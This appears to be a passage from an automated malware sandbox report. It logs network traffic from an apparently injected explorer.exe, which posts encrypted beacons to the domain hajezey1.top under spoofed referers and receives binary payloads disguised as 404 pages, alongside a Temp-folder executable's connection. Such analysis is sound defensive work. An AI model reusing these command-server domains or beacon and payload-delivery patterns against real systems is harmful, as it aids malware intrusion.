b7 f5 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 75 8d b5 be 34 56 9b 46 76 99 86 11 00 83 32 42 92 51 ce ae b8 6b 95 36 e1 48 52 67 76 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac ef 3f ef b2 a9 a6 cc b4 02 47 71 f5 66 3c 3d d0 9f cb 67 14 d8 97 24 c8 b9 fc f0 d4 e8 57 2d 88 d5 74 61 b4 7b 69 ad 66 43 80 1c b7 16 db 64 73 98 f5 51 cf 39 c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 07 1d 02 c1 b9 5a 97 82 fd 11 41 a6 b2 84 35 ce 39 83 ce 85 91 3e 94 d4 54 e5 2f 62 a2 22 27 c6 b9 0a d7 d9 1b c5 89 10 ee 8b ba d7 62 47 d8 ae 85 3a 9d 9b e1 d5 f5 de 38 7f 98 92 ff b0 6a 05 8f a5 0a 9f 36 6f 03 62 53 b5 f8 80 99 8b 84 80 3f 1d b8 3a c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 94 b6 07 e8 9a 4a 17 7a c5 42 14 7e 24 a0 84 ba 8b 65 7d bb 8e da 3b 33 f2 82 6c 27 b4 e3 e4 ce fd 5f 98 3b c4 fe da 3d 8f f5 3f 78 14 42 7b f9 e8 f0 85 a5 46 e5
                                                                                                                          Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|qw+%gt+xQ2P0YObyT=a'4 YU\,4gIXKg[Ge92)g z6u@E}{WpJk"HI?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!UvyShX:-C%GkKm@NQ>[eJ8,#q"JG0Z"?kQTJMQbAd%\#&Q#F<pvA>C/CbGBu4VFv2BQk6HRgvPnj6'NGc_,/DO9W%J}Tzl9\c=~"}h`1%@N!{K.iw]Ai/mv`pV>`|PTZ3z[ ^z&+(l%yw*C=;5"No?hs#9cw9iwN7&,X2wlH%f7-/^'Hg7+w&9c1P0{2%#49FwX?,SC;#vddOU^=i=p.oj"?Gqf<=g$W-ta{ifCdsQ9}p5CPZA59>T/b"'bG:8j6obS?:F/Mv#JzB~$e};3l'_;=?xB{F
                                                                                                                          Oct 29, 2021 17:06:39.176826000 CEST3032INData Raw: bb 63 eb 97 62 c6 70 d9 31 d3 48 45 72 08 8e c1 6c c4 f3 bc f0 be bf 3e 00 d0 91 8a 2d 55 76 8c 94 be 70 8d 45 69 a1 84 05 86 e8 c6 3a 1e 4e 30 c8 3f b1 dc a7 36 0d b4 24 76 f3 61 5f ca bd d3 75 2e 18 45 3b e3 34 16 54 57 74 48 8a 38 7a ea 35 51
                                                                                                                          Data Ascii: cbp1HErl>-UvpEi:N0?6$va_u.E;4TWtH8z5Q*b!F3A2 !Stw %OM:/GIaeuJYAU{l4|Fs_B3D-BX-!,]1B]&?=mW46yH9e@
                                                                                                                          Oct 29, 2021 17:06:39.176887989 CEST3033INData Raw: 67 72 a2 98 b8 d3 52 89 bc 8c 20 84 cb 39 fc d0 e5 ac f9 cf 3b 7a de 3e 42 79 15 7c ce b7 b1 a8 ea ad 57 95 52 5a 81 7f 29 c9 f9 dc 88 2f b7 bd fd 7d 0b 9e 67 da 03 2f dc ec 4f e6 ff 9b e3 76 f3 62 85 0b 6a ac a6 cd 84 a0 d4 12 ec 6d 80 c2 b0 b9
                                                                                                                          Data Ascii: grR 9;z>By|WRZ)/}g/Ovbjm|y~;m4Y`xxgoSfC6{N\-g2~*3g2g{N<OuR<>G[DsC_pl'^{|ar)G0:RdqS=.
                                                                                                                          Oct 29, 2021 17:06:39.176928043 CEST3035INData Raw: 7d da 8b 38 8a 86 13 07 48 99 59 83 3d 9b f5 8d 3f e3 1e 40 88 84 34 4b 44 80 0e ce a3 a7 b7 09 de 10 e6 b8 03 fa 38 17 c4 b2 b7 fd 6d 6c fe 88 6c 20 1d 9e 4d a6 62 69 b7 7a a1 6a f0 1c cf da 9c f1 64 6f 76 04 46 78 de dd 49 2b e1 b4 3e 8d 24 47
                                                                                                                          Data Ascii: }8HY=?@4KD8mll MbizjdovFxI+>$G~,@X!k*b)rG2IDAH)n(up&|a%va7I^3/7A#5lIX!;RPi:Nx~(,qjSL|QK oD!
                                                                                                                          Oct 29, 2021 17:06:39.176968098 CEST3036INData Raw: eb 12 3a 1c 28 6e 5f 24 08 5b a5 35 8d 3e 23 75 c1 f7 3e b1 9a 0b d2 92 bb 22 10 1b 92 d7 78 53 f5 dc dd 4c b3 31 8d 8a 89 da b4 d0 4f 22 28 f1 dd ff 53 1a 2e c9 47 bd 1c 97 66 4c 84 55 b6 53 60 c7 a9 62 13 31 61 11 c8 31 2e 5e a8 63 f1 85 30 f7
                                                                                                                          Data Ascii: :(n_$[5>#u>"xSL1O"(S.GfLUS`b1a1.^c0dt|R4>fEc5I$J3@2m04kwg?Ha"/3vSZ`.N@oY^].PKa~}~oV_cE3Lann4?IkpT|Z
                                                                                                                          Oct 29, 2021 17:06:39.177006006 CEST3038INData Raw: ef 57 94 45 f8 84 96 14 6f 74 5f 72 c0 3b e2 07 45 c1 3c d3 e5 ce a9 91 d0 32 e8 6f cd 2d f1 c0 66 c1 58 19 4a 13 c0 ca 13 28 29 b9 27 ab a8 32 ce f9 af 78 4f be 48 8a 74 17 1b 3c 00 c3 af 8a 2c e2 e1 39 ff c9 9e 0c 59 e4 be 6a 18 33 c1 b3 4c 2b
                                                                                                                          Data Ascii: WEot_r;E<2o-fXJ()'2xOHt<,9Yj3L+h.~]~'lfeDzo=0bD?r2PV8gTSdHffs<WEEd/y]kdO]8?O_8{nA6$M)?u?q}rzJ'Op
                                                                                                                          Oct 29, 2021 17:06:39.177063942 CEST3039INData Raw: 56 78 a0 d2 a2 49 6f 98 2a a1 84 fb d1 cf 69 a5 e5 cd d0 82 5e a7 51 e1 4f 80 6d 7a 14 85 48 7a b3 53 aa bb a6 dc 19 71 77 48 2a c5 5c cd 79 23 a9 f5 10 db c9 79 8f 57 36 37 54 df 58 c5 4e 13 8e cf c4 0c c4 9b 4b e3 51 5c 65 77 65 38 47 d3 87 14
                                                                                                                          Data Ascii: VxIo*i^QOmzHzSqwH*\y#yW67TXNKQ\ewe8Gg=Bkj_(h1H]Y&'<I4:C%5M]Z\L6gg<']uBk$@HNJY]#jm?2000ov<`;oG>g67k%jK/fH
                                                                                                                          Oct 29, 2021 17:06:39.177104950 CEST3040INData Raw: a8 06 0d e8 7f 36 ac 98 7b a6 ba 34 16 c6 7d 81 b3 8c 7e 38 23 52 17 70 1d 15 9e d6 21 37 6e 61 71 d1 c1 b9 f7 0a d1 c6 ac d8 54 c3 92 ae f6 5a 93 7a 16 2f 14 d2 10 94 97 a7 54 57 be c0 ed 8e 85 63 f2 13 5b ca 46 a1 67 45 38 ae d8 46 a4 c3 68 bc
                                                                                                                          Data Ascii: 6{4}~8#Rp!7naqTZz/TWc[FgE8FhsW-\SpH:.Zzz%m,xnZ{BorBz7Uf%OWtvFO*rMbcM*$b{|()0V d5p^H{$%p8b<4-MlD
                                                                                                                          Oct 29, 2021 17:06:39.177141905 CEST3042INData Raw: 70 cf b3 a6 32 32 dd 11 07 4c 4e 02 8c fa 46 c0 cd 49 e6 ce 9d 7f 36 36 45 71 31 f1 84 ff 46 5c fa 24 c1 12 a7 c4 55 2f 4a 75 51 f7 2e 7a dc 49 62 23 20 3d 34 83 3e d2 11 1e 0b 1f b1 32 ba 74 5c a4 4d 33 57 77 9f 79 ec 0c 01 72 11 dc 23 c4 76 08
                                                                                                                          Data Ascii: p22LNFI66Eq1F\$U/JuQ.zIb# =4>2t\M3Wwyr#vs-z3wu":(v,4{E]?$e`)7fwlL|HO8;@E(hhH($'7d$C*<%FmF&ncRK@`h1sOTc#4& ?P
                                                                                                                          Oct 29, 2021 17:06:39.177181005 CEST3043INData Raw: 31 f2 a9 fb f3 90 c1 22 87 b9 0b 68 eb 55 c1 c4 1d 2f b5 2c 17 6d b4 c5 fd d4 a8 af a0 03 d5 31 47 a6 83 d9 f5 0f 33 10 7b 3b 8e 0d 8e 6f dd 61 67 e5 57 f1 fb 1a 55 60 62 b7 3c 28 11 f6 d4 5c 1a 3c 44 7c cd 42 aa 61 ef e4 ed 90 44 4d b3 8b 84 3f
                                                                                                                          Data Ascii: 1"hU/,m1G3{;oagWU`b<(\<D|BaDM?yCred0^9U\.'X^V\q/~EF(jt-h-@`ATlokA]"fGAi>lW(#+(Eyr$Gjq\]JP:
                                                                                                                          Oct 29, 2021 17:06:39.230837107 CEST3046INData Raw: 5f af 3a 5b b9 22 90 bd ba 06 c1 22 42 8b 7f ee 32 8d 2a 3c 04 e8 62 02 8a 42 fa d7 d1 aa 20 57 ae b3 61 b0 ed ea 9d 46 e3 33 e7 80 a7 54 f7 a5 61 dc f0 42 05 85 3d df c3 75 48 af 6d fc 82 8a 4a 52 72 21 fc 6c e5 c9 96 98 71 10 73 85 e7 8f 18 8a
                                                                                                                          Data Ascii: _:[""B2*<bB WaF3TaB=uHmJRr!lqsY' vo@2/-_zqG7_bwb1A5Px0_~r`_\ee!}^M%&QCQz$n3I\@KFye~0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          2192.168.2.749813162.159.134.233443C:\Users\user\AppData\Local\Temp\3113.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          20192.168.2.749809185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:41.129858017 CEST5143OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://evbmwx.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 213
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:41.129885912 CEST5143OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 97 66 5d 02 c9 a1 c1 64 15 af 84 7a
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dz,I]EA}M9w!`}Pce59F[)@ 5;E6yFo$S?4"'Uu6?yj{5Rjo)!ZHa@+2(WB
                                                                                                                          Oct 29, 2021 17:06:41.213016033 CEST5144INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:41 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          21192.168.2.749811185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:41.543771029 CEST5149OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://cmmceyrmx.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 253
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:41.543791056 CEST5149OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 59 bd ae 33
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dY3<?^6TDVAfjgnbi") U'4,i5NZ:6JZ3vo:q|mR W3$5=jh+;t,|.VZ jTZlXKS\[Z
                                                                                                                          Oct 29, 2021 17:06:41.624836922 CEST5151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:41 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 56 3b 38 a6 15 e4 c6 ce a9 22 27 90 32 fb 10 df b7 b7 c8 10 46 15 b1 97 4c c3 f9 8c e2 58 e9 9c b7 3d ef ce 38 1f c1 19 39 ec a8 01 8f 44 ea 9b bf 6e c0 53 5b 76 cb c4 bd 8f 46 84 7f 9c b8 6a f7 5b 61 67 85 1a aa 50 f1 33 0d 4d 9e 1f ed 23 97 05 42 e0 c9 1c 9c 4a be 99 95 43 d2 7c 6c b8 4f 4e 7d bb ad 45 43 37 86 96 3f d8 a1 f7 94 8f c9 3b cb 53 94 6d 9b 3d 70 e0 53 08 55 42 da 49 3b b1 85 2c 03 39
                                                                                                                          Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/arR`g1Q5ih.Kw:i/+".]pW!RY8|-:+%Wt#xQP0ObyT=a'4 YW\|;fKMXKw[Ge)29E"|6N}oczUpJk"HBI?m|6NI^LdU[0zU5=PoV`GZdQJVqu~dwy'$X9:-C'GkKm1`#>[qJ8-,sqK0Z"?+QzJMQAd'\#&Q#2YBA6?C/fGB%4VF>"7"h*6VPgt 4k6'NGc:HNDP8W%WbJ}Tzl9\@nGL"}b1@$@N!;KnGA_OW`kg";kz{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59V;8"'2FLX=89DnS[vFj[agP3M#BJC|lON}EC7?;Sm=pSUBI;,9
                                                                                                                          Oct 29, 2021 17:06:41.624905109 CEST5152INData Raw: 1a d7 38 d6 62 4f 35 3d bc 96 b0 cc 2f f0 49 84 b8 7d 8a 8b 6e 56 22 c1 ff 2f 0c cd fd 4c f7 b1 6a 48 bb 8f 13 4a b9 84 70 d0 65 a9 08 3d 3f 00 5c 74 31 8e f4 65 f6 d2 1a 06 b2 6b b7 98 29 92 71 d0 86 d1 cc 16 4b 45 ab 42 f4 4b ca 38 29 b3 e6 06
                                                                                                                          Data Ascii: 8bO5=/I}nV"/LjHJpe=?\t1ek)qKEBK8)y}s~PG`hSH95!926jRdB<[R[^%3V9l{j Wx#g.v/hW.%_6% &<v0p>=, 3zY
                                                                                                                          Oct 29, 2021 17:06:41.624922991 CEST5154INData Raw: 32 f9 5d c3 bc 0e 98 cd b5 da 03 d7 db 02 0c a3 fc cc fd 5e 3c 7b 37 fa 85 59 15 57 3e 8e d7 ac 1f ab 97 e1 5f 61 9a 2a 30 44 f5 da 18 ef a7 33 5a 94 3a 9f 68 fa 88 6a d4 df 95 06 83 9f b6 77 19 2e 4a ed 82 22 a7 cd 97 2c 01 67 f7 ef fa d6 e3 ea
                                                                                                                          Data Ascii: 2]^<{7YW>_a*0D3Z:hjw.J",g9,fw[urg:L.e/"sf^z\S ]/n]2/g^=3@`#W0V_RsC4CbTCmSLX1xjO>,v)_dG"j}!!
                                                                                                                          Oct 29, 2021 17:06:41.624941111 CEST5155INData Raw: c2 da 2c b7 75 d3 98 eb c1 e4 51 83 6a 10 0c f9 12 b5 e1 35 87 6d fe 69 44 80 83 be a2 f1 5f 0e fd 10 e6 e1 9e 75 7f 13 48 72 c7 ec 98 19 f2 de 3c c8 98 bf 59 a6 d5 ad bb bc f6 62 de 42 a4 87 5e f5 64 e4 b8 52 f9 89 07 a3 8c 2b cc bd 32 fb 20 af
                                                                                                                          Data Ascii: ,uQj5miD_uHr<YbB^dR+2 p2rf8#cUA:v)W6HW+Eu^Zt&oY{.`U]&^%7QY.9/G~($<!=zl5GH3,;?q5WV
                                                                                                                          Oct 29, 2021 17:06:41.624957085 CEST5156INData Raw: b1 63 13 ab 07 6e 13 c5 cf a4 11 84 63 88 18 98 42 aa ba ee c5 7b a2 11 15 84 b9 b4 65 ba 0a ce 6e b7 b9 26 45 5f ce d5 dc 2a 3d aa 0f ee 1e b0 ba 00 47 4c 45 9a ae a6 79 e5 5b a1 c4 16 d9 4b 1f 6b e1 23 07 f5 07 5f cb d1 ba 71 bc 8f 7f 93 d9 f6
                                                                                                                          Data Ascii: cncB{en&E_*=GLEy[Kk#_qlh[+$XU+FSw_7eSHw#RIwT^%7et9%Y,P,q*ip{ZC;qJVM=rO.!1o7{ f65ma??:V;\o'2|iK2)WpK5
                                                                                                                          Oct 29, 2021 17:06:41.624974012 CEST5158INData Raw: 4a 66 ed b2 d9 93 8b 68 a7 ad c2 52 e0 80 94 31 ff 87 34 0c a4 be 8f d4 a2 83 94 2f f6 88 84 e1 5f 12 34 a2 6f ae f6 79 62 01 c1 9e 17 44 43 58 aa 5a 9f 49 a7 71 2c 62 a1 ac c2 10 a1 53 6a cb 2b e0 0a 80 94 05 e6 c3 2c e8 72 1e 10 a4 a2 29 e1 27
                                                                                                                          Data Ascii: JfhR14/_4oybDCXZIq,bSj+,r)'FgW.IQ/Om.V@&Gz!q@!,9d]rgcOoFUDB#Ze\{27:aka:;`tU<|pkvvCy$*[oG
                                                                                                                          Oct 29, 2021 17:06:41.624990940 CEST5159INData Raw: 57 7a 2b ae 7a 08 39 26 d5 d3 9a fb f2 e3 af a8 3f 15 c2 82 16 cd 1f 6c 44 7c 62 f1 92 42 43 86 41 21 a4 bb 4e de e9 8e 35 24 24 5e 1d cd f1 16 d5 2d 50 db 21 4b c8 57 36 6e 02 52 15 35 a6 ed 41 30 3b 64 ec 36 0a e3 d8 19 95 27 ee 4d b7 3b 26 15
                                                                                                                          Data Ascii: Wz+z9&?lD|bBCA!N5$$^-P!KW6nR5A0;d6'M;&rM*$E=BWv!_K-|HTm/b+,GD2L)r#`0wIrmrudAjSn20006Sk;A?%6Rj+PA"Jc#]]xfm
                                                                                                                          Oct 29, 2021 17:06:41.625008106 CEST5160INData Raw: ac 8b 0d 19 92 34 47 9a f0 64 4c 74 32 46 72 04 c2 73 81 c7 10 a4 2c 8e 12 91 f9 29 de c8 e4 76 42 18 48 0c 2b f7 2e 39 25 6d b4 3e 6d 51 7f ef 27 87 e9 d0 9c 47 ff 69 68 58 d0 85 b1 44 d4 84 85 63 b5 9a e6 0e bb 5e 98 7c 8d 72 25 b9 5b cc e4 9a
                                                                                                                          Data Ascii: 4GdLt2Frs,)vBH+.9%m>mQ'GihXDc^|r%[sW_S$GV~m(;R_9n}v\PRXkz<<hbj]CHXl3Lk*Dtkz{@tQotDoLQV~r"H^dQ`w@!
                                                                                                                          Oct 29, 2021 17:06:41.625025034 CEST5162INData Raw: a8 33 4c 59 dd 3f 36 ff f8 ba a6 0d 08 ca b6 3f 30 c4 64 3e 60 84 c4 00 22 79 7c 5d 2a 25 45 b5 33 42 48 15 45 dd da 3b 85 8d a8 19 a2 54 2f cc de d4 f7 e9 35 83 34 bd d4 df 0f 15 b1 a0 33 93 f9 48 b6 62 94 fb f1 ed 21 29 09 09 19 dc a8 4d 84 8e
                                                                                                                          Data Ascii: 3LY?6?0d>`"y|]*%E3BHE;T/543Hb!)MKxu}@ Uo58j[x"dl#;Xm:)`R"8Ui,*ulolH?I~]Bm]v$rq]coi[v~/J:3ON^`zOuiQb
                                                                                                                          Oct 29, 2021 17:06:41.625041008 CEST5163INData Raw: bb 22 46 3c c0 6e 3f a6 3c 09 bb 95 15 51 b3 ce b8 a8 18 d5 ee 92 e5 a7 8c 2d 25 2a f6 fc 2b ca ca eb dc 84 aa 38 f8 4b 4e d7 a7 09 88 a6 ac ed 67 e0 3a c3 c1 1b 76 55 24 b7 b7 1a 50 f2 2a 6c a2 3d 7d 4e 8b 42 5b 52 42 e7 7e a1 5b 4c fa bc ce 3f
